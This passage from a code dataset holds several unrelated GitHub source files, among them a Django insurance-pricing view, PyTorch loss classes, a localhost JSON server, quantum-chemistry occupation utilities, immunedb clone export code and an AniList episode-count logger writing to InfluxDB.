NAIC_Sub_Industry_Code_11.objects.first()['industry']\n@csrf_exempt\ndef create_policy(request):\n # To fetch the list of all the major Industries\n # Fetches the class code of the Industry based on the input\n # Fetches the Sub-Industry based on the Class Code\n # Gets the 4 digit sub-class-code based on the User Input\n # Query to get the Hazard class multiplier for the specific Sub-Industry\n # User Inputs\n # Select appropriate Deductible multiplier\n # User input\n # Select appropriate Increased Limit Factor\n # Asks the User for his Annual revenue to calculate the Base price\n\n all_industries = NAIC_Industry_Code.objects.all() \n class_code = NAIC_Industry_Code.objects.filter(class_code = request.POST['class_code'])[0].class_code\n sub_industry = NAIC_Sub_Industry_Code_54.objects.first().industry\n class_sub_code = NAIC_Sub_Industry_Code_54.objects.first().class_sub_code\n hazard_level_rating = NAIC_Sub_Industry_Hazard_Rating.objects.filter(class_sub_code = class_sub_code)[0].hazard_level_rating\n hazard_rate_multiplier = Hazard_Rate_Multiplier.objects.filter(hazard_level_rating = hazard_level_rating)[0].rate_multiplier\n deductible_amount = request.POST['deductible_amount'] \n deductible_multiplier = EO_Pricing_Model_Deductible.objects.filter(deductible_amount = deductible_amount)[0].multiplier \n coverage_limit = request.POST['coverage_limit'] \n inc_limit_factor = EO_Pricing_Model_Limit.objects.filter(occurence_limit = coverage_limit)[0].increased_limit_factor\n ann_revenue_norm = int(request.POST['ann_revenue'])/1000\n base_marginal_rate = getBaseRate(ann_revenue_norm)\n marginal_rate = 1\n base_rate = 0\n if len(base_marginal_rate) == 1 :\n base = EO_Pricing_Model_Base_Rate.objects.filter(annual_sales = base_marginal_rate[0])[0].base_rate\n base_rate = base\n else :\n base = EO_Pricing_Model_Base_Rate.objects.filter(annual_sales = base_marginal_rate[0])[0].base_rate\n marginal_rate = EO_Pricing_Model_Marginal.objects.filter(annual_sales = base_marginal_rate[1])[0].marginal_price\n base_rate = base + (ann_revenue_norm - base_marginal_rate[0]) * marginal_rate\n premium_price = float(base_rate * hazard_rate_multiplier * deductible_multiplier * inc_limit_factor * 1.4)\n return HttpResponse(premium_price)\n\ndef policy_details(request, policy_code, naic_code):\n print(request)\n print(policy_code)\n print(naic_code)\n return 
HttpResponse(\"OK\")\n\ndef policy_description(request):\n print(request)\n return HttpResponse(\"OK\")\n\n# 'policy_description\n# 'create_policy","repo_name":"andiwonder/freelance_stuff","sub_path":"insurance/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22309010938","text":"from setuptools import setup, find_packages\nfrom setuptools.command.test import test as TestCommand\n\nclass PyTest(TestCommand):\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n #import here, cause outside the eggs aren't loaded\n import sys, pytest\n errcode = pytest.main(self.test_args)\n sys.exit(errcode)\n\nsetup(\n name='mmb_perceptron',\n version='0.0.1',\n description='Perceptron algorithms for machine learning',\n url='http://github.com/mbollmann/perceptron/',\n license='MIT License',\n author='Marcel Bollmann',\n author_email='bollmann@linguistics.rub.de',\n packages=find_packages(),\n install_requires=['numpy>=1.8.0', 'progressbar2==3.5.0'],\n tests_require=['pytest'],\n cmdclass={'test': PyTest},\n scripts=['bin/perceptron-tagger.py', 'bin/perceptron-print-weights.py']\n)\n","repo_name":"mbollmann/perceptron","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35904020634","text":"import torch.nn.functional as F\r\nfrom torch.nn.modules.loss import _WeightedLoss\r\nimport torch\r\nimport torch.nn as nn\r\nimport math\r\n\r\nLOSS_FACTORY = {'classification': lambda args, scaling: ClassificationLoss(args, scaling),\r\n 'binary_classification': lambda args, scaling: BinaryClassificationLoss(args, scaling),\r\n 'regression': lambda args, scaling: RegressionLoss(args, scaling)}\r\n\r\nclass Loss(nn.Module):\r\n def __init__(self, args, scaling):\r\n super(Loss, self).__init__()\r\n self.args = args\r\n self.scaling = scaling \r\n\r\n def kl_divergence(self, kl):\r\n if len(kl)>1:\r\n return kl.mean()\r\n else:\r\n return kl\r\n\r\nclass BinaryClassificationLoss(Loss):\r\n def __init__(self, args, scaling):\r\n super(BinaryClassificationLoss, self).__init__(args, scaling)\r\n self.bce = nn.BCELoss()\r\n\r\n def forward(self, outs, targets, model, kl, gamma, n_batches, n_points):\r\n if self.scaling=='whole':\r\n bce = n_points*self.bce(outs, targets)\r\n kl = self.kl_divergence(kl) / n_batches\r\n elif self.scaling =='batch':\r\n bce = self.bce(outs, targets)\r\n kl = self.kl_divergence(kl) / (outs.shape[0]*n_batches)\r\n else:\r\n raise NotImplementedError('Other scaling not implemented!')\r\n loss = bce + gamma*kl\r\n return loss, bce, kl\r\n\r\n\r\nclass ClassificationLoss(Loss):\r\n def __init__(self, args, scaling):\r\n super(ClassificationLoss, self).__init__(args, scaling)\r\n self.ce = _SmoothCrossEntropyLoss(smoothing=self.args.smoothing)\r\n def forward(self, outs, targets, model, kl, gamma, n_batches, n_points):\r\n if self.scaling=='whole':\r\n ce = n_points*self.ce(outs, targets)\r\n kl = self.kl_divergence(kl) / n_batches\r\n elif self.scaling=='batch':\r\n ce = self.ce(outs, targets)\r\n kl = self.kl_divergence(kl) / (outs.shape[0]*n_batches)\r\n else:\r\n raise NotImplementedError('Other scaling not implemented!')\r\n loss = ce + gamma * kl\r\n\r\n return loss, ce, kl\r\n\r\nclass RegressionLoss(Loss):\r\n def __init__(self, 
args, scaling):\r\n super(RegressionLoss, self).__init__(args, scaling)\r\n self.mse = nn.MSELoss()\r\n\r\n def forward(self, outs, targets, model, kl, gamma, n_batches, n_points):\r\n if self.scaling == 'whole':\r\n mse = n_points*self.mse(outs, targets)\r\n kl = self.kl_divergence(kl) / n_batches\r\n elif self.scaling == 'batch':\r\n mse = self.mse(outs, targets)\r\n kl = self.kl_divergence(kl) / (outs.shape[0]*n_batches)\r\n else:\r\n raise NotImplementedError('Other scaling not implemented!')\r\n loss = mse + gamma*kl\r\n return loss, mse, kl\r\n\r\nclass _SmoothCrossEntropyLoss(_WeightedLoss):\r\n def __init__(self, weight=None, reduction='mean', smoothing=0.0):\r\n super().__init__(weight=weight, reduction=reduction)\r\n self.smoothing = smoothing\r\n self.weight = weight\r\n self.reduction = reduction\r\n\r\n @staticmethod\r\n def _smooth_one_hot(targets, n_classes, smoothing=0.0):\r\n assert 0 <= smoothing < 1\r\n with torch.no_grad():\r\n targets = torch.empty(size=(targets.size(0), n_classes),\r\n device=targets.device) \\\r\n .fill_(smoothing / (n_classes-1)) \\\r\n .scatter_(1, targets.data.unsqueeze(1), 1.-smoothing)\r\n return targets\r\n\r\n def forward(self, inputs, targets, smoothing = None):\r\n if smoothing is None:\r\n smoothing = self.smoothing\r\n targets = _SmoothCrossEntropyLoss._smooth_one_hot(targets, inputs.size(-1),\r\n smoothing)\r\n lsm = torch.log(inputs)\r\n\r\n if self.weight is not None:\r\n lsm = lsm * self.weight.unsqueeze(0)\r\n\r\n loss = -(targets * lsm).sum(-1)\r\n\r\n if self.reduction == 'sum':\r\n loss = loss.sum()\r\n elif self.reduction == 'mean':\r\n loss = loss.mean()\r\n\r\n return loss","repo_name":"martinferianc/BayesianNeuralNets","sub_path":"src/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"34049432416","text":"#!/usr/bin/env python\n\nimport json\nimport queue\nimport threading\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom sys import exit\n\n\n# HTTPRequestHandler class\nclass RequestHandler(BaseHTTPRequestHandler):\n dataQueue = None\n lastData = None\n\n def address_string(self):\n host, port = self.client_address[:2]\n # return socket.getfqdn(host)\n return host\n\n def refresh_data(self):\n try:\n latestData = json.dumps(self.dataQueue.get(False))\n if len(latestData) > 10:\n self.lastData = latestData\n except queue.Empty:\n pass\n\n # GET\n def do_GET(self):\n global data\n # Send response status code\n self.send_response(200)\n\n # Send headers\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n\n self.refresh_data()\n\n # Send message back to client\n message = self.lastData\n\n # Write content as utf-8 data\n self.wfile.write(bytes(message, \"utf8\"))\n return\n\n def log_message(self, format, *args):\n return\n\n\nclass MyHTTPServer(HTTPServer):\n def serve_forever(self, dataQueue):\n self.RequestHandlerClass.dataQueue = dataQueue\n HTTPServer.serve_forever(self)\n\n\nclass APIServer(threading.Thread):\n\n def __init__(self, port):\n threading.Thread.__init__(self)\n self.port = port\n\n self.httpd = None\n\n self.dataQueue = queue.LifoQueue(50)\n\n def run(self):\n # Server settings\n # Choose port 8080, for port 80, which is normally used for a http server, you need root access\n server_address = ('127.0.0.1', self.port)\n self.httpd = MyHTTPServer(server_address, RequestHandler)\n self.httpd.serve_forever(self.dataQueue)\n\n def 
stop(self):\n if self.httpd:\n self.httpd.shutdown()\n exit(0)\n","repo_name":"david98/pynetmonitor","sub_path":"apiserver.py","file_name":"apiserver.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"501092163","text":"import serial\nimport time\nimport threading\nimport bpy\n\nprint(\"-----\")\n\n#Setup random cubez\nfrom random import randint\n\n#how many cubes you want to add\ncount = 8\n\nfor c in range(0,count):\n\tx = c*1.2\n\ty = 0\n\tz = 0\n\tbpy.ops.mesh.primitive_cube_add(location=(x,y,z))\n\n\n\nfor cube in range (0, len(bpy.data.objects)):\n\tprint(bpy.data.objects[cube])\n\nprint(\"-----\")\n\n\n\nser = serial.Serial(\"COM4\", 9600)\n\n\ndef readSerialData():\n\twhile True:\n\t\tline = str(ser.readline())\n\t\tline = line.replace(\"b'\", \"\")\n\t\tline = line.replace(\"\\\\r\\\\n'\", \"\")\n\t\tprint(type(line))\n\t\td = line.split(':')\n\t\tprint(d)\n\t\t\n\n\t\tfor i in range (0, len(d)-1):\n\t\t\tif(d[i] == \"1\"):\n\t\t\t\tbpy.data.objects[i].scale = (1, 10, 1)\n\t\t\telse:\n\t\t\t\tbpy.data.objects[i].scale = (1, 1, 1)\n\ndef doOtherStuff():\n\ttxt = input(\"INPUT: \")\n\tif(txt == \"0\"):\n\t\texit()\n\nthreading.Thread(target=readSerialData).start()\n#threading.Thread(target=doOtherStuff).start()\n","repo_name":"shandouming1/Blenduino","sub_path":"archive/blenderThreadingSerialTest.py","file_name":"blenderThreadingSerialTest.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"37511147815","text":"\"\"\"\nFractional occupation number (FON) utilities for SCF convergence\n\nImplementation of FON-HF technique.\nJCP 110 2, 1999\n\"\"\"\nimport numpy as np\n\n# set up constants\nBOLTZMANN = 1.38064852E-23 # J / K\nj_to_h = 2.293710449E17\nBOLTZMANN_H = BOLTZMANN * j_to_h\n\nclass FON:\n\n def __init__(self):\n pass\n\n def broadening_param_to_temp(self, beta):\n return 1 / (BOLTZMANN_H * beta)\n\n def get_start_temp(self, dmat, fock, overlap):\n error = fock @ dmat @ overlap - overlap @ dmat @ fock\n return 10_000 * np.linalg.norm(error)\n\n def pfon_rhf(self, temp: float, orb_energies: np.ndarray, num_alpha):\n \"\"\"pseudo-fractional-occupation. Fermi energy is defined as\n e_HOMO + e_LUMO / 2. 
Occupations do not necessarily sum to\n the target number of electrons so we need to normalize the occs.\n\n Effectively this means that for a given temperature a higher\n number of virtuals are fractionally occupied.\n \"\"\"\n e_homo = orb_energies[num_alpha - 1]\n e_lumo = orb_energies[num_alpha]\n e_fermi = (e_lumo + e_homo) / 2\n n_i = np.array(self.fermi_dirac(orb_energies, e_fermi, temp))\n return n_i * num_alpha / np.sum(n_i)\n\n def frac_occ_rhf(self, temp: float, orb_energies: np.ndarray, num_alpha):\n \"\"\"\n Determine fractional occupations for a given temperature\n\n The Fermi energy is determined by bisection such that\n\n \\sum_{i}n_{i} = N\n\n where n_{i} is\n\n n_{i} = 1 / (1 + e^{beta(e_{i} - e_{f})})\n\n and N is the number of electrons\n\n For the binary search if e_f = e_{0} then occupation is 0.5\n if e_f = e_{-1} then occupation is (norb-1) + 0.5\n \"\"\"\n e_fermi = self.bisection_fermi_energy_search(orb_energies[0],\n orb_energies[-1],\n num_alpha,\n orb_energies,\n temp\n )\n return self.fermi_dirac(orb_energies, e_fermi, temp)\n\n def bisection_fermi_energy_search(self, e_f_init_low: float,\n e_f_init_high: float, target_n: int,\n orb_e: np.ndarray, temp: float) -> float:\n \"\"\"\n Bisection search for the fermi energy\n \"\"\"\n current_score = 0\n low_val = e_f_init_low\n high_val = e_f_init_high\n while not np.isclose(current_score, target_n):\n middle_val = (low_val + high_val) / 2\n middle_score = sum(self.fermi_dirac(orb_e, middle_val, temp))\n if middle_score < target_n:\n low_val = middle_val\n else:\n high_val = middle_val\n current_score = middle_score\n return middle_val\n\n def fermi_dirac(self, e_i: np.ndarray, e_f: float, temp: float):\n \"\"\"safe fermi-dirac avoids numerical overflow\"\"\"\n beta = 1 / (BOLTZMANN_H * temp)\n exp_val = beta * (e_i - e_f)\n # print(\"x \", exp_val)\n # print(\"1 + e^x\", 1 + np.exp(exp_val))\n # print(\"1 + e^-x\", 1 + np.exp(-exp_val))\n safe_fd = []\n for xx in exp_val:\n if xx > 10:\n sfd = np.exp(-xx) / (1 + np.exp(-xx))\n elif xx < -10:\n sfd = 1 / (1 + np.exp(xx))\n else:\n sfd = 1 / (1 + np.exp(xx))\n safe_fd.append(sfd)\n return safe_fd\n\n\nif __name__ == \"__main__\":\n np.set_printoptions(linewidth=300)\n from pyscf import gto, scf\n import openfermion as of\n from rhf import RHF\n\n # mol = gto.M(\n # verbose=0,\n # atom='O 0.000000000000 -0.143225816552 0.000000000000;H 1.638036840407 1.136548822547 -0.000000000000; H -1.638036840407 1.136548822547 -0.000000000000',\n # basis='sto-3g',\n # )\n mol = gto.M(\n verbose=0,\n atom='Li 0 0 0; H 0 0 5.0',\n basis='sto-3g',\n )\n s = mol.intor('int1e_ovlp')\n t = mol.intor('int1e_kin')\n v = mol.intor('int1e_nuc')\n eri = mol.intor('int2e', aosym='s1') # (ij|kl)\n rhf = RHF(t + v, s, eri, mol.nelectron, iter_max=3,\n diis_length=4)\n rhf.solve_diis()\n fon = FON()\n mo_e = rhf.mo_energies\n # print(mo_e)\n # print(sum(fon.fermi_dirac(rhf.mo_energies, rhf.mo_energies[0], 10)))\n # print(sum(fon.fermi_dirac(rhf.mo_energies, rhf.mo_energies[-1], 10)))\n # print()\n # e_f = fon.bisection_fermi_energy_search(mo_e[0], mo_e[-1], rhf.nelec // 2,\n # mo_e, 10)\n # print(fon.fermi_dirac(rhf.mo_energies, e_f, 10))\n # n_i = fon.frac_occ_rhf(500000, mo_e, 2)\n n_i = fon.pfon_rhf(50000, mo_e, 2)\n print(n_i)\n print(sum(n_i))","repo_name":"ncrubin/qcpanop","sub_path":"qcpanop/scf/fon.py","file_name":"fon.py","file_ext":"py","file_size_in_byte":4867,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"73787069633","text":"import time\n\nfrom Hatlab_RFSOC.proxy import getSocProxy\nfrom qick import *\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom tqdm import tqdm\nsoc, soccfg = getSocProxy(\"myqick216-01\")\nfrom T004C_phaseReset_test import LoopbackProgram\n\n\n\n\n\nconfig = {\"res_ch\": 0, # --Fixed\n \"ro_chs\": [0], # --Fixed\n \"reps\": 20000, # --Fixed\n \"relax_delay\": 1.0, # --us\n \"res_phase\": 0, # --degrees\n \"pulse_style\": \"const\", # --Fixed\n\n \"length\": 1000, # [Clock ticks]\n # Try varying length from 10-100 clock ticks\n\n \"readout_length\": 1000, # [Clock ticks]\n # Try varying readout_length from 50-1000 clock ticks\n\n \"pulse_gain\": 30000, # [DAC units]\n # Try varying pulse_gain from 500 to 30000 DAC units\n\n # \"pulse_freq\": 2457.60 * 3 +10 , # [MHz]\n # \"readout_freq\": 10, # [MHz]\n\n \"pulse_freq\": 4933.3, # [MHz]\n \"readout_freq\": 18.1, # [MHz]\n\n \"adc_trig_offset\": 120, # [Clock ticks]\n # Try varying adc_trig_offset from 100 to 220 clock ticks\n\n \"soft_avgs\": 1\n # Try varying soft_avgs from 1 to 200 averages\n\n }\n\n###################\n# Try it yourself !\n###################\n\npulse_len_list = np.arange(100, 200, 1)\nbufi_list = np.zeros((len(pulse_len_list), config[\"reps\"]))\nbufq_list = np.zeros((len(pulse_len_list), config[\"reps\"]))\ni = 0\nwhile i < len(pulse_len_list):\n try:\n config[\"length\"] = pulse_len_list[i]\n config[\"readout_length\"] = pulse_len_list[i]\n prog = LoopbackProgram(soccfg, config)\n avg_i, avg_q = prog.acquire(soc, load_pulses=True, progress=False, debug=False)\n bufi_list[i] = prog.di_buf[0]\n bufq_list[i] = prog.dq_buf[0]\n i+=1\n print(i)\n except RuntimeError:\n print(i, \"!!!!!!!!\")\n\n\n\navgi = np.average(bufi_list, axis=1)\navgq = np.average(bufq_list, axis=1)\nstdr_i = np.std(bufi_list, axis=1)\nstdr_q = np.std(bufq_list, axis=1)\n\n\n\nplt.figure()\nplt.title(\"avg\")\nplt.plot(pulse_len_list, avgi)\nplt.plot(pulse_len_list, avgq)\n\nplt.figure()\nplt.title(\"std err\")\nplt.plot(pulse_len_list, stdr_i)\nplt.plot(pulse_len_list, stdr_q)\nplt.xlabel(\"pulse (integration) length, clock cycles\")\n\nplt.figure()\nplt.title(\"avg/stderr\")\nplt.plot(pulse_len_list, abs(avgi/stdr_i))\nplt.plot(pulse_len_list, abs(avgq/stdr_q))\nplt.xlabel(\"pulse (integration) length, clock cycles\")\n\n\n","repo_name":"PITT-HATLAB/Hatlab_RFSOC","sub_path":"Hatlab_RFSOC/legacy/demo_scripts/T004D_phaseReset_test_integ.py","file_name":"T004D_phaseReset_test_integ.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"40060648982","text":"from collections import Counter\n\nimport numpy as np\nfrom sqlalchemy.orm import joinedload\n\nfrom immunedb.common.models import CloneStats, Sample\nfrom immunedb.exporting.tsv_writer import StreamingTSV\nfrom immunedb.exporting.writer import ExportWriter\nfrom immunedb.util.funcs import chunks\nfrom immunedb.util.lookups import aas_from_nts\nfrom immunedb.util.log import logger\n\nDEFAULT_CLONE_FIELDS = [\n 'clone_id', 'subject', 'v_gene', 'j_gene', 'functional', 'insertions',\n 'deletions', 'cdr3_nt', 'cdr3_num_nts', 'cdr3_aa',\n 'uniques', 'instances', 'copies', 'germline', 'parent_id',\n 'avg_v_identity', 'top_copy_seq'\n]\n\n\ndef get_clone_row(clone):\n row = {}\n for field in DEFAULT_CLONE_FIELDS:\n try:\n row[field] = getattr(clone, field)\n except AttributeError:\n pass\n row.update({\n 'clone_id': clone.id,\n 'subject': 
clone.subject.identifier,\n 'functional': 'T' if clone.functional else 'F',\n 'insertions': clone._insertions,\n 'deletions': clone._deletions,\n 'uniques': clone.overall_unique_cnt,\n 'instances': clone.overall_instance_cnt,\n 'copies': clone.overall_total_cnt,\n })\n return row\n\n\ndef get_immunedb_output(session, clones):\n writer = StreamingTSV(DEFAULT_CLONE_FIELDS)\n yield writer.writeheader()\n\n for clone, agg in clones.items():\n counts = agg['counts']\n row = get_clone_row(clone)\n row['copies'] = counts['copies']\n row['instances'] = counts['instances']\n row['top_copy_seq'] = agg['top_seq']\n row['avg_v_identity'] = round(agg['avg_v_identity'], 4)\n yield writer.writerow(row)\n\n\ndef get_vdjtools_output(session, clones):\n writer = StreamingTSV(['count', 'freq', 'cdr3nt', 'cdr3aa', 'v', 'd', 'j'])\n counts = Counter()\n total_copies = 0\n for clone, agg in clones.items():\n key = (clone.v_gene, clone.j_gene, clone.cdr3_nt)\n counts[key] += agg['counts']['copies']\n total_copies += counts[key]\n\n yield writer.writeheader()\n for key in sorted(counts, key=counts.get, reverse=True):\n count = counts[key]\n v, j, cdr3_nt = key\n yield writer.writerow({\n 'count': count,\n 'freq': count / total_copies,\n 'cdr3nt': cdr3_nt,\n 'cdr3aa': aas_from_nts(cdr3_nt),\n 'v': v,\n 'd': '.',\n 'j': j,\n })\n\n\ndef _get_feature(stat, feature):\n if feature == 'subject':\n return stat.clone.subject.identifier\n elif feature == 'sample':\n return stat.sample.name\n else:\n return stat.sample.metadata_dict.get(feature, 'NA')\n\n\ndef get_pooled_samples(session, sample_ids, features):\n stats = session.query(\n CloneStats\n ).options(\n joinedload(CloneStats.sample),\n joinedload(CloneStats.clone).defer('tree'),\n )\n aggregated = {}\n for chunk_sample_ids in chunks(sample_ids, 20):\n for stat in stats.filter(CloneStats.sample_id.in_(chunk_sample_ids)):\n sample_feature = tuple(\n _get_feature(stat, f) for f in sorted(features)\n )\n key = (stat.sample.subject.identifier, sample_feature)\n agg = aggregated.setdefault(key, {}).setdefault(\n stat.clone,\n {'top_seq': None, 'top_copies': 0, 'counts': Counter(),\n 'avg_v_identity': []}\n )\n if stat.top_copy_seq_copies > agg['top_copies']:\n agg['top_copies'] = stat.top_copy_seq_copies\n agg['top_seq'] = stat.top_copy_seq_sequence\n agg['counts']['copies'] += stat.total_cnt\n agg['counts']['instances'] += stat.unique_cnt\n agg['avg_v_identity'].append(stat.avg_v_identity * stat.total_cnt)\n\n for clones in aggregated.values():\n for agg in clones.values():\n agg['avg_v_identity'] = np.sum(\n agg['avg_v_identity']) / agg['counts']['copies']\n\n return aggregated\n\n\ndef get_filename(subject, feature_keys, feature_values):\n if feature_keys == ('subject',):\n return '{}.pooled.tsv'.format(subject)\n feature_value = '_AND_'.join(feature_values)\n return '{}.{}.pooled.tsv'.format(subject, feature_value)\n\n\ndef write_pooled_clones(session, out_format, sample_ids=None,\n pool_on=('sample',), zipped=False, **kwargs):\n # Samples and subjects can't be combined with other features\n exclusives = set(pool_on).intersection(set(('sample', 'subject')))\n if len(pool_on) > 1 and exclusives:\n pool_on = (list(exclusives)[0],)\n logger.warning('You specified pooling on {feat} which '\n 'cannot be combined with other features.'\n ' Using only {feat}.'.format(feat=pool_on[0]))\n\n logger.info('Writing clones pooled by {} in {} format'.format(\n ','.join(pool_on), out_format))\n\n sample_ids = sample_ids or [s.id for s in session.query(Sample)]\n aggregated = 
get_pooled_samples(session, sample_ids, pool_on)\n\n output_func = {\n 'immunedb': get_immunedb_output,\n 'vdjtools': get_vdjtools_output\n }[out_format]\n with ExportWriter(zipped=zipped) as fh:\n for (subject, feature_value), clones in aggregated.items():\n logger.info('Pooling subject {} for feature(s) {}'.format(\n subject,\n ','.join(feature_value)))\n fh.set_filename(get_filename(subject, pool_on, feature_value))\n fh.write(output_func(session, clones))\n return fh.get_zip_value()\n","repo_name":"arosenfeld/immunedb","sub_path":"immunedb/exporting/clones/listing.py","file_name":"listing.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"3890621223","text":"import os\nfrom datetime import datetime\n\nimport requests\nimport pandas as pd\n\nfrom influxdb_client import InfluxDBClient, Point, WritePrecision\nfrom influxdb_client.client.write_api import SYNCHRONOUS\nfrom subprocess import Popen, PIPE\n\n\n# get InfluxDB Token\nwith open('config') as f:\n\twords = f.read().split(\" \")\n\ttoken = words[0]\n\torg = words[1]\n\tbucket = words[2]\n\tprojectPath = words[3]\n\tcsvFilePath = projectPath + 'historyStats.csv'\n\nanilistApiUrl = 'https://graphql.anilist.co'\n\ndef getEpSeen(name):\n query = '''\n query($name:String) {\n\t\tUser(name: $name) {\n\t\t\tstatistics {\n\t\t\t\tanime {\n\t\t\t\t\tepisodesWatched\n\t\t\t\t}\n\t\t\t}\n\t\t}\n }\n '''\n # Define our query variables and values that will be used in the query request\n variables = {\n 'name': name\n }\n # Make the HTTP Api request\n response = requests.post(anilistApiUrl, json={'query': query, 'variables': variables}).json()\n return response[\"data\"][\"User\"][\"statistics\"][\"anime\"][\"episodesWatched\"]\n\n\ndef getFollowingRequest(id, page):\n\t# Here we define our query as a multi-line string\n query = '''\n query ($page: Int, $perPage: Int) {\n Page(page: $page, perPage: $perPage) {\n\t\t\tpageInfo {\n\t\t\t\ttotal\n\t\t\t}\n\t\t\tfollowing(userId:''' + str(id) + ''') {\n\t\t\t\tname\n\t\t\t}\n\t\t}\n }\n '''\n\n # Define our query variables and values that will be used in the query request\n variables = {\n 'page': page\n }\n # Make the HTTP Api request\n response = requests.post(anilistApiUrl, json={'query': query, 'variables': variables}).json()\n return response\n\ndef convertToList(jsonArr):\n result = []\n for i in jsonArr:\n result.append(i[\"name\"])\n\n return result\n\ndef getFollowing(id):\n response = getFollowingRequest(id, 1) # First request\n total = response['data']['Page']['pageInfo']['total']\n followers = response['data']['Page']['following']\n\n for i in range(2, int(total/50)+2): # If the first page was not enough to contain all the users, request the next pages\n response = getFollowingRequest(id, i)\n followers = followers + response['data']['Page']['following'] # appending users\n\n return convertToList(followers)\n\n\ntoday = datetime.today().strftime('%Y%m%d')\nusers = getFollowing(179627) #user id of Piede\nprint(users)\n\n # creating dataframe\n #\tif not already present, creating an empty one\nif os.path.isfile(csvFilePath):\n\tdf = pd.read_csv(csvFilePath)\nelse:\n\tdata = {'name':users}\n\tdf = pd.DataFrame(data)\n\n# creating new column for today's date\nif(df.columns[-1] != today):\n\tdf[today] = -1\n\nfor user in users:\n\tepCount = getEpSeen(user)\n\tprint(user + \": \" + str(epCount))\n\t# if user is not present in the df yet\n\tif (len(df[df['name'] == user]) == 0):\n\t\t# we're 
adding him\n\t\tdf.loc[len(df)] = [user]+[-1]*(len(df.columns)-1)\n\t\n\t# adding today's value in the respective cell\n\tdf.loc[df['name'] == user,today] = epCount\n\n\ndf.to_csv(csvFilePath, index=False)\n\n\nwith InfluxDBClient(url=\"http://localhost:8086\", token=token, org=org) as client:\n\twrite_api = client.write_api(write_options=SYNCHRONOUS)\n\tdateObj = datetime.strptime(today, \"%Y%m%d\")\n\n\tfor index, row in df.iterrows():\n\t\tname = row['name']\n\t\tcount = df[today][index]\n\t\t\n\t\t# Ignoring -1 values (missing records)\n\t\tif(count != -1):\n\t\t\tprint(str(dateObj) + \" - \" + name + \": \" + str(count))\n\t\t\tpoint = Point(name) \\\n\t\t\t\t.field(\"viewed_episodes\", count) \\\n\t\t\t\t.time(dateObj, WritePrecision.NS)\n\t\t\t\n\t\t\twrite_api.write(bucket, org, point)\n\n\n\nscript = 'display notification \"Finished running ANILIST script\" with title \"Added all data to Influx!\"'\np = Popen(['osascript', '-'], stdin=PIPE, stdout=PIPE, stderr=PIPE, universal_newlines=True)\nstdout, stderr = p.communicate(script)","repo_name":"AlexPerathoner/Anilist-watched-episodes","sub_path":"csvcreator.py","file_name":"csvcreator.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13082090359","text":"from django.db import models\n\nfrom accounts.models import CustomUser, Country\n\nSTATUS_CHOICES = (\n (False, 'Show only custom events'),\n (True, 'Show only official holidays events'),\n)\n\n\nclass Event(models.Model):\n user = models.ManyToManyField(\n CustomUser,\n related_name='custom_user_event',\n through='CustomUserEvent',\n blank=True\n )\n name = models.CharField(\n max_length=100,\n verbose_name='event_name'\n )\n start_datetime = models.DateTimeField(\n verbose_name='event_start_datetime'\n )\n end_datetime = models.DateTimeField(\n blank=True,\n verbose_name='event_end_datetime'\n )\n\n \"\"\"\n The value of next attribute is set by default by migration \n '0002_add_default_value_for_Notification.py'.\n It is necessary to create the first record in the database table \n \"\"\"\n\n notification = models.ForeignKey(\n 'Notification',\n on_delete=models.SET_DEFAULT,\n default=1,\n verbose_name='notification_event'\n )\n\n country_holiday = models.ForeignKey(\n Country,\n on_delete=models.CASCADE,\n blank=True,\n null=True,\n related_name='country_event'\n )\n\n official_holiday = models.BooleanField(\n choices=STATUS_CHOICES,\n default=False,\n db_index=True\n )\n\n def save(self, *args, **kwargs):\n if not self.end_datetime:\n self.end_datetime = self.start_datetime.replace(\n hour=23,\n minute=59,\n second=00\n )\n super().save(*args, **kwargs)\n\n class Meta:\n constraints = [\n models.UniqueConstraint(\n fields=['name', 'start_datetime', 'end_datetime'],\n name='name_start_datetime_end_datetime_unique'),\n ]\n\n objects = models.Manager()\n\n\nclass CustomUserEvent(models.Model):\n user = models.ForeignKey(\n CustomUser,\n on_delete=models.CASCADE,\n related_name='custom_user_user_event'\n )\n event = models.ForeignKey(\n Event,\n on_delete=models.CASCADE,\n related_name='event_user_event'\n )\n subscription_status = models.BooleanField(\n default=False,\n db_index=True\n )\n\n class Meta:\n constraints = [\n models.UniqueConstraint(\n fields=['user', 'event'],\n name='user_event_unique'),\n ]\n\n objects = models.Manager()\n\n\nclass Notification(models.Model):\n description = models.CharField(\n max_length=80,\n verbose_name='notification_description'\n )\n 
